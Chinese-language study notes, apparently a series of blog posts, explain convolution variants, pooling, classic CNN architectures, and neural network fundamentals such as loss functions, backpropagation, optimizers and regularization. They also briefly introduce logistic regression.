dilated_convolution

与正常的卷积不同,空洞卷积引入了一个叫做 膨胀率(dilation rate) 的参数,用于控制卷积核中间的 0 的插入间隔。膨胀率为 1 时,空洞卷积退化为正常的卷积。膨胀率为 2 时,卷积核中间插入一个 0,膨胀率为 3 时,卷积核中间插入两个 0,以此类推。

空洞卷积的卷积核需要进行调整后才能使用正常卷积的感受野计算公式:

$$ k' = k + (k-1) \times (d - 1) $$

其中:

  • $k'$ 是调整后的卷积核大小
  • $k$ 是原始卷积核大小
  • $d$ 是膨胀率

不难理解这个式子,空洞卷积相当于在原有卷积核中插入了 $k-1$ 次,每次插入 $d-1$ 个 0。

计算感受野需要使用调整后的卷积核大小 $k'$:

$$ RF_{i+1}=RF_i+(k'-1)\times S_i $$

其中各参数定义如前。

空洞卷积与反卷积的区别:反卷积(Deconvolution)主要用于增大图像尺寸,是 上采样(upsampling) 的一种,而空洞卷积并没有做上采样。

  • 空洞卷积是为了在卷积核中间插入 0,以 增大感受野,它可以不改变图像的大小。
  • 反卷积是在输入的基础上插入 0,以此来增大图像的尺寸,从而 增大输出的特征图的尺寸

3D 卷积

回想我们之前提到的 2D 卷积,我们总是在原图像的各个通道的二维平面上滑动卷积核,实现卷积操作。一个不恰当的比喻是,在这种情况下,把图片视为一个三维的像素块,那么其在 “深度”(也就是原先的通道数)上,长度恒为 3,而且此时一个卷积核在 “深度” 这个维度上的输入长度等于输入图像的 “深度” 数。这意味着我们的卷积核在这个维度上是 “全连接” 的而非 “滑动” 的。

然而,在处理医学 MRI 图像时,我们通常会遇到 3D 体素数据,即数据是以三维形式存在的。与 2D 卷积相比,3D 卷积在深度方向上也有扩展(可能有几百几千个像素)。因此,我们可以将 2D 的通道概念推广到 3D 的深度维度,在这个维度上,也实现一个卷积核的滑动。

因此,在 3D 卷积中,卷积核不仅在宽度和高度上移动,还在深度上移动。卷积核会有一个额外的维度,即深度。这意味着,如果我们有一个形状为 $(D, H, W)$ 的三维数据,卷积核可能会有一个形状为 $(d, h, w)$,其中 $d, h, w$ 分别对应卷积核在深度、高度和宽度方向上的尺寸。

对于一个具有多个通道(是的,三维图像也可以有通道数,这里的通道可以类似二维的 RGB 类比,MRI 存在不同的加权 T1,T2 像,或者你理解为一个 3D 的彩色图像?)的 MRI 图像,卷积核的形状将是 $(\text{depth} \times \text{height} \times \text{width} \times \text{input_channels} \times \text{n_filters})$。

此时,输出的通道数依旧是卷积核的数量 $\text{n_filters}$,但是输出的特征体的形状将会是 $(D', H', W', \text{n_filters})$,其中 $(D', H', W')$ 是输出特征体的尺寸,这些尺寸取决于输入尺寸、卷积核尺寸、步长(stride)和填充(padding)策略。

池化(Pooling)

池化算法是一种在卷积神经网络中常用的操作,其动机在于增强模型对输入数据中小的平移变化的不变性,即当输入图像稍微移动时,网络的输出不应产生大的变化。

可以这么理解:池化是一种特殊的卷积操作,它 没有一个可学习的参数 (即一般卷积核的权重),只是对输入数据进行一种固定的操作。池化操作可以 减少特征图的尺寸(所以也是降采样) ,减少计算量和参数数量,同时提高模型的鲁棒性。

常见的池化方法包括:

MaxPooling:取区域内的最大值

max_pooling

MeanPooling:取区域内的平均值

mean_pooling

空间金字塔池化:在不同尺度上执行池化,以捕获多尺度信息

动机:如果我们只是简单的进行一个固定尺度的池化,那么可能会丢失一些重要的信息。例如,我们将一张 $100 \times 100$ 的图像简单的池化,那么:

  • 如果我们采用很大的池化尺寸,比如 $50 \times 50$,那么我们会丢失很多细节信息
  • 如果我们采用很小的池化尺寸,比如 $2 \times 2$,那么我们会丢失很多全局信息

因此,我们可以在不同尺度上执行池化,然后将这些不同尺度的特征 拼接 在一起 ~~(既要又要行为)~~,以捕获多尺度的信息。这种方法被称为空间金字塔池化(Spatial Pyramid Pooling)。

pyramid_pooling

其具体步骤为:

  1. 输入特征图被划分成不同尺度的区域网格,如 $3\times3$、$2\times2$ 和 $1\times1$。
  2. 在每个区域网格内执行池化操作(如最大池化或平均池化),得到不同尺度的特征向量。
  3. 将这些不同尺度的特征向量 拼接 起来,形成最终的特征表示。注意这里的拼接不同于简单的相加,而是将不同尺度的特征向量 在通道维度上 “串连” 起来

池化操作的注意事项

  • 池化层一般会减小特征图的尺寸,这点需要在设计网络时考虑
  • 池化层的使用能够减少参数数量,从而减少计算量和过拟合的风险
  • 在设计 CNN 时应合理选择池化策略,以保持特征的有效性
  • 池化的感受野计算同正常卷积层

分层表示学习(Hierarchical Representation Learning)

在 CNN 中,我们通过堆叠多个卷积层和池化层来逐渐提取图像的高级特征,实现 层次化的特征学习 。这种网络中,越低的层次(感受野小)提取的是图像的低级特征,如边缘、纹理等,而越高的层次(感受野大)提取的是图像的高级特征,如物体的形状、部分等。

卷积架构(Convolutional Architecture)

AlexNet

首次引入 ReLU 激活函数、Dropout 技术,以及数据增强,提高了模型的训练效率和泛化能力。

AlexNet 采用了 8 层深的网络结构,证明了深度网络的潜力。

VGG

VGG 网络采用了连续的小尺寸卷积核($3\times3$),通过层叠多个卷积层来提高网络的深度,增强了模型的表达能力。其特点包括:

  • 小尺寸卷积核 :使用连续的 $3\times3$ 卷积层,这种设计可以用更少的参数量达到与大尺寸卷积核相同的感受野。
  • 层叠效应 :两个 $3\times3$ 卷积层的感受野等于一个 $5\times5$ 卷积层,三个则等效于 $7\times7$。这种设计增加了网络的深度,同时引入了更多的非线性变换,提高了模型的表达能力。

ResNet

ResNet 通过引入 残差(residual) 学习解决了深度网络训练难的问题,成功训练了超过 100 层的网络,证明了超深网络的潜力。

残差学习是一种帮助深层神经网络更好地训练的技术,特别是在网络非常深时。它是通过引入所谓的 “残差块” 来实现的,这些残差块使得网络可以 学习到输入和输出之间的差异,即残差,而不是直接学习一个完整的输出。

在深度学习中,理论上 网络越深,其表达能力越强。但实际上,随着网络层数的增加,训练网络变得越来越困难。这是因为存在所谓的梯度消失和梯度爆炸问题,即在深层网络中,梯度(用于更新网络权重的信息)在传播过程中会变得非常小或非常大,导致网络 难以训练 。虽然理论上讲,经过足够多的训练,我们总是可以让网络收敛,但实际上,这种训练过程会变得非常缓慢,甚至无法收敛。

残差学习通过在网络中引入 “快捷连接”(也称为 “跳跃连接”) 解决这个问题。这些连接允许一部分输入直接 “跳过” 一或多层,然后与这些层的输出相加。这样,网络就可以学习到输入和输出之间的 残差 。如果输入和输出之间没有太大差异,网络可以学习到一个接近零的残差,这使得网络训练变得更加容易。

用数学语言简单表达,假设我们希望学习的目标映射为 $H(x)$,我们让网络去拟合残差映射 $F(x) = H(x) - x$。则原始的映射目标可以表示为 $H(x) = F(x) + x$。这里的 $x$ 即为通过 “快捷连接” 直接传递的输入部分,$F(x)$ 是网络中几层的输出部分,二者相加即得到最终的输出。

residual_block

一个直观的理解是,我们的网络总是很容易的学到一个权重为 0 的 恒等映射,这等价于直接将输入传递给输出。也等价于一个层数少一层的网络。多次利用这种关系,我们就可以保证 提高网络的深度不会带来性能的下降

深度可分离卷积

深度可分离卷积(Depthwise Separable Convolution)是一种高效的卷积操作,由两个步骤组成:

  1. 深度卷积(Depthwise Convolution) :在每个输入通道中,单独进行卷积操作。
  2. 逐点卷积(Pointwise Convolution):使用长宽维度上为 $1\times1$ 的卷积核对深度卷积的输出的每个位置进行卷积,组合来自 不同通道 的信息。

乘法次数比较

  • 标准卷积所需的乘法次数为:

    $$ \text{filter_size_height} \times \text{filter_size_width} \times \text{height} \times \text{width} \times \text{in_channels} \times \text{out_channels} $$

  • 深度卷积所需的乘法次数为:

    $$ \text{filter_size_height} \times \text{filter_size_width} \times \text{height} \times \text{width} \times \text{in_channels} $$

  • 逐点卷积所需的乘法次数为:

    $$ \text{height} \times \text{width} \times \text{in_channels} \times \text{out_channels} $$

深度可分离卷积通过分解标准卷积操作,大幅减少了所需的计算量。

depthwise_separable_convolution

这张图非常形象了,你可以把这张图中出现的每个立方体看做一个卷积范围,其中单位体积对应一次乘法。可以看到,相较于标准卷积(a),深度可分离卷积(b+c)的乘法次数大大减少。

转置卷积 / 反卷积(Transpose Convolution/Deconvolution)

转置卷积 / 反卷积主要用于 上采样(Upsampling) 操作,即将较小的数据特征图扩大到较大的尺寸。其基本原理是对输入特征图进行 “填充” 和 “扩展”,然后应用标准卷积操作。

上采样可以理解为下采样的逆过程,即将特征图的尺寸从小变大。

假设我们有一个 $H \times W$ 的输入特征图(例如图像),我们想将其上采样至更大的尺寸。转置卷积操作可以表示为:

  1. 插值步骤(Interpolation Step) :首先,在输入特征图的元素之间插入零,增加特征图的尺寸。

  2. 卷积步骤(Convolution Step) :接下来,对扩大后的特征图应用一个标准的卷积操作。假设使用的卷积核大小为 $k \times k$,则此步骤相当于在扩大的特征图上滑动卷积核,计算卷积输出。

给定输入特征图 $X$,转置卷积操作可以用以下公式表示:

$$ Y = f_{\text{conv}}(Z(X, s-1,p), K) $$

其中:

  • $Y$ 是输出特征图

  • $f_{\text{conv}}$ 表示卷积函数

  • $Z(X, s-1, p)$ 表示在输入特征图 $X$ 中插入零的操作,也即每个元素之间插入 $s-1$ 个零,然后在四周填充 $p$ 个零。

    注意,填充参数在转置卷积中是必须的

  • $K$ 是卷积核。

反卷积提供了一种从较小特征图生成较大特征图的有效方式,对于需要恢复图像细节或扩大特征图尺寸的任务来说非常重要。(这个思想在 U-Net 等网络中被广泛应用!)

deconvolution

反卷积的感受野计算

反卷积(Deconvolution)通常用于神经网络中的上采样,是卷积的逆过程(并不严格)。反卷积输出尺寸的公式是:

$$ o = (i - 1) \times s + k - 2p $$

其中:

  • $o$:输出尺寸。
  • $i$:输入尺寸。
  • $s$:步长。
  • $k$:卷积核尺寸。
  • $p$:填充。

这个公式是由正常的卷积公式中调换 $i$ 和 $o$​ 然后进行推导得到的。

注意这里别想着用正常的填 0 操作来正着推,你就记得他是反着卷的就行,填 0 哪里我也没搞清楚是怎么填的,他似乎并不是严格按照步长去填的...

Credit

dreamer5z / 感受野与空洞卷积

💾

神经网络基础

2024年3月23日 04:03

神经元模型

神经元模型是神经网络的基本单元,它接收输入信号,对输入信号进行 加权求和 ,权重 / 参数(weight/parameter)的绝对值越大,则代表对应的输入 $x$ 对输出影响越大,然后通过激活函数处理,最后输出结果。

基于向量相乘的实现,分为列格式和行格式。

列格式

$$ \begin{aligned} {x} &= \begin{bmatrix}{x}_1 \ {x}_2 \ {x}_3\end{bmatrix} \quad {w} = \begin{bmatrix}{w}_1 \ {w}_2 \ {w}_3\end{bmatrix} \ \ z &= {w}^T{x} \ &= \begin{bmatrix}{w}_1 \ {w}_2 \ {w}_3\end{bmatrix}\begin{bmatrix}{x}_1 \ {x}_2 \ {x}_3\end{bmatrix} \end{aligned} $$

在这种格式下,$x$ 的每个分量都是一个特征,$w$ 的每个分量都是对应特征的权重。$z$ 是一个标量。

行格式

$$ \begin{aligned} {x} &= \begin{bmatrix}{x}_1 \ {x}_2 \ {x}_3\end{bmatrix} \quad w=\begin{bmatrix}w_1\w_2\w_3\end{bmatrix} \ \ z &= {x}{w} \ &= \begin{bmatrix}{x}_1 \ {x}_2 \ {x}_3\end{bmatrix}\begin{bmatrix}{w}_1 \ {w}_2 \ {w}_3\end{bmatrix} \end{aligned} $$

同列格式一样,这里 $x$ 的每个分量也都是一个特征,$w$ 的每个分量也都是对应特征的权重。$z$ 是一个标量。

不同点在于,这种格式在代码中更为常用,这是因为我们经常多个样本一起处理(mini-batch),通过将第一个维度(第 0 维)留给样本数,可以更方便的处理多个样本。

当然,我们也可以再加上偏置(bias) $b$,来增加模型的表达能力(改变原先必然过圆心的决策边界):

bias

激活函数

激活函数 (activation function):对神经元的输出进行非线性变换,提供非线性性(non-linearity),增加神经网络的表达能力。

常用的激活函数及对应的公式、映射关系如下:

  • Sigmoid 函数
    • 公式:$f(x)=\frac{1}{1+e^{-x}}$
    • 映射关系:$(-\infty,+\infty) \rightarrow (0,1)$,输出值在 0 到 1 之间,用以 表示概率
  • Tanh 函数
    • 公式:$f(x)=\frac{e^x-e^{-x}}{e^x+e^{-x}}=\frac{2}{1+e^{-2x}}$
    • 映射关系:$(-\infty,+\infty) \rightarrow (-1,1)$,输出值在 -1 到 1 之间,常用于 回归任务
  • ReLU 函数
    • 公式:$f(x)=\max(0,x)$
    • 映射关系:$(-\infty,+\infty) \rightarrow (0,+\infty)$,最常用的分类函数,可以用于特征提取、 简化网络优化 (缓解梯度消失问题、偏导数好计算)
  • Leaky ReLU 函数
    • 公式:$f(x)=\max(\alpha x,x)$
    • 映射关系:$(-\infty,+\infty) \rightarrow (-\infty,+\infty)$,解决 ReLU 函数中负数部分输出为 0 的问题,其中的 $\alpha$ 是一个小的常数,如 0.01,在 Parametric ReLU 中,这个 $\alpha$ 是一个可学习的参数
  • Softmax 函数
    • 公式:$f(x_i)=\frac{e^{x_i}}{\sum_{j=1}^n e^{x_j}}$
    • 映射关系:$(-\infty,+\infty) \rightarrow (0,1)$,输出值在 0 到 1 之间,用以 表示概率,使得所有激活值之和为 1

多层感知器(Multi-Layer Perceptron, MLP)

多层感知器是一种 前馈神经网络,它由 输入层隐藏层输出层 组成。

相较于单层感知器的线性决策边界,多层感知器通过将多个单层感知器叠加,后一个层将原有层的输出值当做特征值来学习,也就是 “在原有特征的基础上,再次进行特征提取(变换)”,从而具有更好的表达能力。这能更好的解决现实中更复杂的问题。

mlp

注意,$a$ 代表的是激活函数的输出,之前的 $z$ 代表的是加权求和的结果。$a = f(z)$

$$ a_k^l $$

  • $l$ 代表层索引,$l=1,2,\cdots,L$,直接以输入值作为输入层可以写为 $x=a^0$
  • $k$ 代表神经元索引,$k=1,2,\cdots,K$

多层感知器可以进一步抽象成 Encoder-Decoder 模型,其中 Encoder 用于提取特征,Decoder 用于还原数据。

encoder-decoder

这个模型后续会在 RNN 和 Seq2Seq 中有所体现。现今大火的 Diffusion Model 也正是基于这个思想来设计的。

在当前学习的全连接 MLP 中,我们可以简单的认为除输出层外的所有层都是 Encoder,输出层是 Classifier。

损失函数

损失函数 (loss function):用来量化网络 预测的输出(predicted output)给定训练数据输出(ground truth) 之间的 误差 (error,也称 loss value)

损失函数用来设定优化神经网络参数(如权重、偏置)的目标,降低损失函数等价于优化神经网络,在此过程中,模型通过更新其参数来使得误差尽可能小。

梯度下降(gradient descent)是最常用的优化方法。

损失函数的选择:

首先,我们回忆一下之前我们是如何定义交叉熵的:

$$ \begin{aligned} L_i&=-\log P(Y=y_i|X=x_i) \end{aligned} $$

这里的 $P(Y=y_i|X=x_i)$ 是指在给定输入 $x_i$ 的情况下,输出 $y_i$ 的概率。这个概率是由神经网络给出的,也就是 $P(Y=y_i|X=x_i)=f(x_i)$,其中 $f$ 是神经网络的输出函数。

分类问题:交叉熵损失函数(cross-entropy loss function)

公式是:

$$ \begin{aligned} \mathcal{L}&=-\sum_{k=1}^K y_k\log(a_k)\ \mathcal{L}&=-\frac{1}{M}\sum_{m=1}^M\sum_{k=1}^K y_k^m\log(a_k^m) \end{aligned} $$

其中:

  • $K$ 是类别的总数
  • $y_k$ 是一个独热编码向量,其中只有对应真实类别的那一项为 1,其余为 0
  • $a_k$ 是神经网络输出的概率预测,对应于类别 $k$
  • 上标 $m$ 表示第 $m$ 个样本。

第一个式子为单个样本的损失函数,第二个式子为多个样本的损失函数。

逻辑回归问题的损失函数

二分类条件下的交叉熵损失函数:

$$ \mathcal{L} = y\log(a) + (1 - y)\log(1 - a)\ \mathcal{L} = \sum_{m=1}^{M} (y^m\log(a^m) + (1 - y^m)\log(1 - a^m)) $$

其中:

  • $a$ 是神经网络的输出,也就是模型预测的分类概率。
  • $y$ 是真实值,也即标签
  • 上标 $m$ 代表第 $m$ 个样本,而不是幂次。

由于 $y$ 是标签,所以 $y$ 和 $1-y$ 有一个取值为 0 另一个为 1,这被用于选择正确的损失项,当真实标签 $y^m=1$ 时,$y^m\log(a^m)$ 项用于计算损失;当 $y^m=0$ 时,$(1 - y^m)\log(1 - a^m)$ 项用于计算损失。

第一个式子为单个样本的损失函数,第二个式子为多个样本的损失函数。

使用 GPT4 生成的从头推导(符号可能有些不一样)

逻辑回归的损失函数是从最大似然估计(Maximum Likelihood Estimation, MLE)推导而来的。

给定一组数据,MLE 的目标是找到模型参数(在逻辑回归中是权重 $w$ 和偏差 $b$),使得观察到的数据出现的概率(似然)最大。

对于逻辑回归,似然函数可以写为:

$$ L(\theta) = \prod_{i=1}^{m} P(y^{(i)} | x^{(i)}; \theta) = \prod_{i=1}^{m} a^{y^{(i)}}(1-a)^{1-y^{(i)}} $$

其中:

  • $m$ 是样本数量,
  • $y^{(i)}$ 是第 $i$ 个样本的真实类别,
  • $x^{(i)}$ 是第 $i$ 个样本的特征,
  • $a$ 是模型关于参数 $\theta$ (即权重和偏差)预测的概率,
  • $\theta$ 是模型参数。

取对数似然,我们得到对数似然函数:

$$ \log L(\theta) = \sum_{i=1}^{m} y^{(i)} \log(a) + (1-y^{(i)}) \log(1-a) $$

在优化问题中,通常最小化负的对数似然,因此损失函数变为:

$$ J(\theta) = -\frac{1}{m}\sum_{i=1}^{m} [y^{(i)} \log(a) + (1-y^{(i)}) \log(1-a)] $$

这就是逻辑回归中常用的损失函数,也称为对数损失(Log Loss)或交叉熵损失(Cross-Entropy Loss)。

回归问题:均方误差损失函数(mean squared error loss function,MSE)

MSE 是 $L_{2}$ 范数,往往用来衡量网络输出值 $a$ 和训练数据输出值 $y$ 的差别。

$$ \text{loss}(Y, f(X)) = (Y - f(X))^2 $$

L 范数

$$ ||x||L = \left( \sum{i=1}^n |x_i|^L \right)^{\frac{1}{L}} $$

  • $L=1$ 时,称为 L1 范数,MAE(Mean Absolute Error,平均绝对误差)。用于衡量两个向量之前差别的大小
  • $L=2$ 时,称为 L2 范数,MSE(Mean Squared Error,均方误差)。用来衡量网络输出值 $a$ 和训练数据输出值 $y$ 的差别(MAE 也可以,区别在于 L2 范数对异常值更敏感)

优化

目的:给定网络 $f(x;\theta)$ 和损失函数 $\mathcal{L}$ ,以获得好的参数 $\theta$,最小化损失函数 $\mathcal{L}$。

最常用的优化方法是梯度下降(gradient descent)。梯度下降的思想是通过不断迭代来更新参数,使得损失函数最小化。

梯度下降

$$ w_j:=w_j-\alpha\frac{\partial\mathcal{L}}{\partial w_j}\quad w=[w_1,w_2,...] $$

  • $\alpha$ 称为学习率(learning rate)
  • $\frac{\partial\mathcal{L}}{\partial w_j}$ 称为梯度(gradient),代表损失函数 $\mathcal{L}$ 对权重 $\partial w_j$ 的偏导数
  • $w_j$ 称为权重(weight),$j$ 代表权重的索引
  • $w$ 称为权重向量(weight vector)

gradient_descent

在更高的维度,可能无法很好的可视化这个过程,但是其思想是一样的。

无论有多少参数,我们只需要计算出梯度 $\frac{\partial\mathcal{L}}{\partial\theta}$ 即可优化每一个参数。

$$ \boldsymbol{\theta}:=\boldsymbol{\theta}-\alpha\frac{\partial\mathcal{L}}{\partial\boldsymbol{\theta}} $$

误差反向传播

误差反向传播(Backpropagation,BP)是一种用于训练神经网络的方法,其就是梯度下降的思想的具体实现。

误差反向传播,也就是利用链式法则来计算损失函数对参数的梯度的方法。为了计算对于每个参数的偏导数,我们首先计算每个神经元的中间结果 $\delta$,也就是损失函数 $L$ 对于神经网络中某一层的激活值 $z$ 的偏导数 $\delta=\frac{\partial L}{\partial z}$。

利用这个中间结果 $\delta$ ,我们可以计算损失函数对于每个参数 $\theta$ 的偏导数 $\frac{\partial L}{\partial \theta}$,即最终我们需要的梯度。进而通过这个梯度,我们可以调整参数 $\theta$ 来减少整个网络的损失。

backpropagation

图中展示了一个简化的神经网络结构,包含输入层、多个隐藏层和输出层。每一层都有多个神经元(用 $a$ 表示),它们之间通过权重(即参数 $\theta$)相连。在训练过程中,我们首先正向传播输入信号,然后根据输出和实际值计算损失,最后通过反向传播算法来更新权重,以此循环直至模型训练完成。

梯度消失(Gradient Vanish)/ 梯度爆炸(Gradient Explode) 问题

在深度神经网络中,梯度消失和梯度爆炸是一个常见的问题。这是因为在反向传播过程中,梯度会随着层数的增加而指数级的减小或增大。

举个例子,考虑 Sigmoid 函数的导数:

$$ \begin{aligned} \sigma(x)&=\frac{1}{1+e^{-x}}\ \sigma'(x)&=\sigma(x)(1-\sigma(x)) \end{aligned} $$

在 Sigmoid 函数的导数中,当 $x$ 趋近于正无穷或负无穷时,$\sigma'(x)$ 趋近于 0。这就是梯度消失的原因。当梯度消失时,网络的训练将变得非常困难,因为梯度会在反向传播的过程中经过这些层时变得非常小,导致网络无法学习到有效的参数。

为了解决这个问题,我们可以使用 ReLU 函数来引入非线性:

$$ \text{ReLU}(x)=\max(0,x) $$

它的导数在 $x>0$ 时为 1,这样可以避免梯度消失的问题。

随机梯度下降(Stochastic Gradient Descent, SGD)

到现在为止,我们所说的梯度下降(GD)都是基于整个数据集的。然而,当数据集非常大时,计算整个数据集的梯度是非常耗时的(非常昂贵的)。

在梯度下降的基础上,后来提出的随机梯度下降是一种更高效的优化方法。它不是在整个数据集上计算梯度,而是在每次迭代中 随机选择一批数据(mini-batch)来计算梯度

为什么可以这么做?原因如下:

$$ \begin{align} \mathbb{E}[\nabla l_{t_i}(x)] &= \mathbb{E}[\nabla f(x)] \ &= \frac{1}{n} \sum_{i} \nabla l_i(x) \end{align} $$

其中:

  • $l_i(x)$ 是第 $i$ 个数据点的损失函数
  • $f(x)$ 是整个数据集上的目标函数
  • $\nabla l_i(x)$ 是第 $i$ 个数据点的梯度
  • $\nabla f(x)$ 是整个数据集上目标函数的真实梯度
  • $n$ 是数据集的大小
  • $t_i$ 是随机选择的数据点

这个公式说明,对于随机选择的 单个数据点 $t_i$ 的梯度 $\nabla l_{t_i}(x)$ 的期望(即平均情况下的值)与整个数据集上目标函数 $f(x)$ 的真实梯度 $\nabla f(x)$​ 的期望是相等的。

基于无偏估计(下降方向是对真实梯度方向的无偏估计)的假设,我们可以用它来近似真实梯度。

进一步的,为了充分利用硬件资源、减少单样本采样导致的抖动,我们选取通过 一批数据计算均值,再以此均值作为(估计的)梯度下降的方向,这一方法称为小批量随机梯度下降,这同样是一个无偏的近似,还降低了方差(减少了抖动)。

$$ \begin{aligned} \mathbf{x}t=\mathbf{x}{t-1}-\frac{\eta_t}{b}\sum_{i\in I_t}\nabla\ell_i(\mathbf{x}{t-1})\ \mathbb{E}[\frac1b\sum{i\in I_t}\nabla\ell_i(\mathbf{x})]=\nabla f(\mathbf{x}) \end{aligned} $$

这里:

  • $\mathbf{x}_t$ 是第 $t$ 次迭代的参数
  • $\mathbf{x}_{t-1}$ 是第 $t-1$ 次迭代的参数
  • $\eta_t$ 是学习率
  • $b$ 是批大小,等于 $|I_t|$
  • $I_t$ 是第 $t$ 次迭代的数据索引集合,是在时间 $t$ 时随机选择的的一个子集。

这一批数据的大小称为 批大小(batch size),通常是 32、64 或 128。这样,我们可以在每次迭代中更快地计算梯度,从而加速训练过程(相较于喂入整个数据集,也即一次完整的跑一个 epoch)。

通过多次更新参数,mini-batch 可以覆盖整个训练数据集,一个 epoch 则被称为覆盖一次整个训练数据集。

后续还会学到,我们可以在此基础上做 batch normalization 来加速训练、减少对初始化的依赖。

当然,SGD 也有它的缺点,比如可能会陷入局部最优解等等,我们会在后文中介绍其他的 SGD 变种,如 RMSprop、Adam 等。

学习率调度

学习率(learning rate)是梯度下降算法中的一个重要超参数,它决定了参数更新的速度。

  • 学习率太大会导致参数更新过快,从而错过最优解
  • 学习率太小会导致参数更新过慢,从而训练时间过长

为了解决这个问题,我们可以使用学习率调度(learning rate schedule)来动态调整学习率。学习率调度可以根据训练过程中的不同阶段来调整学习率,例如每隔一定的 epoch 或当损失函数不再下降时。

学习率调度的常见方法有(非考试范围,了解即可):

Adagrad(Adaptive Gradient)

Adagrad 是一种自适应学习率调整方法,它可以针对每个参数调整学习率,特别适合处理稀疏数据。Adagrad 的更新规则如下:

$$ G_{t} = G_{t-1} + \nabla_{\theta}J(\theta)^2 $$

$$ \theta_{t+1} = \theta_t - \frac{\eta}{\sqrt{G_t + \epsilon}} \cdot \nabla_{\theta}J(\theta) $$

其中:

  • $G_t$ 是到目前为止所有梯度平方的累加
  • $\epsilon$ 是一个小的平滑项,防止分母为零
  • $\eta$ 是初始学习率

Adagrad 的关键优点是不需要手动调整学习率,由于 $G_t$ 不断累加,它能先快后慢地自动进行调整学习率。然而,它也存在一个缺点,随着训练的进行,$G_t$ 会不断累加,导致学习率趋于零,使得训练在后期几乎不再更新参数。

RMSprop

RMSprop 是一种改进自 Adagrad 的自适应学习率方法。公式如下:

$$ v_{t} = \beta v_{t-1} + (1 - \beta)\nabla_{\theta}J(\theta)^2 $$

其中:

  • $v_t$ 是梯度平方的指数移动平均
  • $\beta$ 是衰减率,用于控制历史信息保留的多少
  • $\nabla_{\theta}J(\theta)$ 是当前梯度
  • $J(\theta)$ 是损失函数。

RMSprop 通过除以 $v_t$ 来调整每一步的学习率,使得学习率逐渐减小。

在获得 $v_t$ 后,我们以如下式子对参数进行更新:

$$ \theta_{t+1} = \theta_t - \frac{\eta}{\sqrt{v_t + \epsilon}} \cdot \nabla_{\theta}J(\theta) $$

与 Adagrad 不同,RMSprop 通过指数移动平均的方式来调整学习率,以丢弃遥远的梯度历史信息(让距离当前越远的梯度的缩减学习率的权重越小),从而使得学习率不会过早降低,从而更好地适应训练数据。

Adam(Adaptive Moment Estimation)

为了克服 Adagrad 在训练后期学习率过小的问题,Adam 算法被提出。Adam 同时考虑了梯度的一阶矩(即梯度本身)和二阶矩(即梯度的平方)的指数移动平均,其更新规则如下:

$$ m_t = \beta_1 m_{t-1} + (1 - \beta_1)\nabla_{\theta}J(\theta) $$

$$ v_t = \beta_2 v_{t-1} + (1 - \beta_2)\nabla_{\theta}J(\theta)^2 $$

$$ \hat{m}_t = \frac{m_t}{1 - \beta_1^t} $$

$$ \hat{v}_t = \frac{v_t}{1 - \beta_2^t} $$

$$ \theta_{t+1} = \theta_t - \frac{\eta}{\sqrt{\hat{v}_t + \epsilon}} \cdot \hat{m}_t $$

其中:

  • $m_t$ 和 $v_t$ 分别是梯度的一阶矩和二阶矩的指数移动平均
  • $\beta_1$ 和 $\beta_2$ 是衰减率,通常接近 1
  • $\hat{m}_t$ 和 $\hat{v}_t$ 是对 $m_t$ 和 $v_t$ 的偏差校正,以便在训练初期得到更准确的估计
  • $\eta$ 是学习率

Adam 结合了 RMSprop 和 Momentum 的优点,不仅自适应调整每个参数的学习率,还能利用梯度的一阶矩信息加速训练,在实际应用中表现良好。

如果你对动量 Momentum 不熟悉,可以参考 这篇文章

超参数优化

超参数选择(Hyper-Parameter Selection)的主要目的是找到一个合适的模型 $f(x; \theta)$,使其 在训练数据集上不过拟合(overfit),同时在测试数据集上能很好地泛化(generalize)。

超参数 包括网络层数、神经元数、激活函数、批大小、训练 epoch 数等,对模型性能有重要影响。

三个数据集的区别:

  • 训练数据集(Training Data)用于训练模型
  • 验证数据集(Validation Data)用于评估和比较不同超参数组合对应的模型性能,并选择性能最佳的超参数
  • 测试数据集(Test Data)用于最终评估选定的模型性能。不能用测试集来验证超参数性能,这是作弊。 因为其会导致模型过拟合测试数据。

交叉验证(Cross Validation) 是一种常用的超参数选择方法。它将数据分成多个子集,每次用其中一个子集作为验证集,其余作为训练集,遍历所有子集组合,从而避免了使用单一的验证集可能带来的偏差。

正则化

动机:解决过拟合(Overfitting)。

过拟合:指的是模型 在训练数据上表现很好,但在测试数据上表现很差

其原因是模型过于复杂,导致模型在训练数据上学习到了噪声,而不是真正的模式。当我们的模型参数过多,超过样本数量时,模型就会过拟合。

为了解决过拟合问题,我们可以使用正则化(Regularization)方法。其思想是,我们对于损失函数添加一个惩罚项,从而限制模型的复杂度,使其更容易泛化到未见过的数据。

提前停止法(Early Stopping)

在训练过程中,我们不断地监控验证集的损失,当验证集的损失不再下降时,我们停止训练,从而避免模型过拟合。

early-stopping

权重衰减(Weight Decay)

权重衰减是一种常用的正则化方法,其思想是通过在损失函数中添加损失项来限制权重的大小,从而减少模型的复杂度。

$$ \mathcal{L}_{total} = \mathcal{L} + \lambda ||{W}|| $$

权重衰减只用于权重 weight,不用于偏置 bias。

L1 vs L2 正则化

L1-vs-L2

L1 对小的数值产生的惩罚比 L2 要大,因此(参数小于 1 时,其梯度更大)L1 正则化会使得模型更加稀疏,此称之为 稀疏特性,即更多的参数为 0。L2 正则化则会使得模型的参数更加平滑。

与之相反的,L2 不会产生稀疏解,所有参数都会被缩小但不会变成零。

Dropout

Dropout 是一种随机正则化方法,其思想是,因为包含大量神经元的神经网络使其很容易过拟合,所以可以在训练过程中 随机丢弃一部分神经元(对隐藏输出置 0),从而减少模型的复杂度,防止过拟合。

具体来说,Dropout 会以概率 $p$ 随机丢弃一部分神经元,其余神经元的输出乘以 $\frac{1}{1-p}$,从而 保持其期望值不变

dropout

测试 / 正常使用的时候,不再随机置 0 的原因:确保模型的输出稳定且充分利用训练时学到的所有信息。

💾

机器学习中的线性回归与分类问题

2024年3月13日 17:10

机器学习

机器学习:指通过算法的设计与分析使得我们能够 基于经验 提升模型在某些任务上的表现

三要素:任务、经验、表现

  • 线性回归(Linear Regression):连续预测
  • 线性分类(Linear Classification):离散预测,线性决策边界

逻辑回归(Logistic Regression)

逻辑回归用于分类而非回归。它输出的是 “属于一个分类” 的 概率

逻辑回归是 有参方法,它的参数在于线性组合里的各个特征的权重 / 偏置部分。

  1. Unit-step function(单位阶跃函数):这是一个简单的分法,当 $z<0$ 时,$y=0$;当 $z=0$ 时,$y=0.5$;当 $z>0$ 时,$y=1$。
  2. Logistic function(逻辑函数或 Sigmoid 函数):它是单位阶跃函数的平滑版本,用来代替单位阶跃函数。逻辑函数的公式是 $y = \frac{1}{1 + e^{-z}}$,其中 $e$ 是自然对数的底数,$z$ 通常是特征与权重的线性组合。这个函数将 $z$ 映射到一个 $(0,1)$ 区间内的值,表示概率。

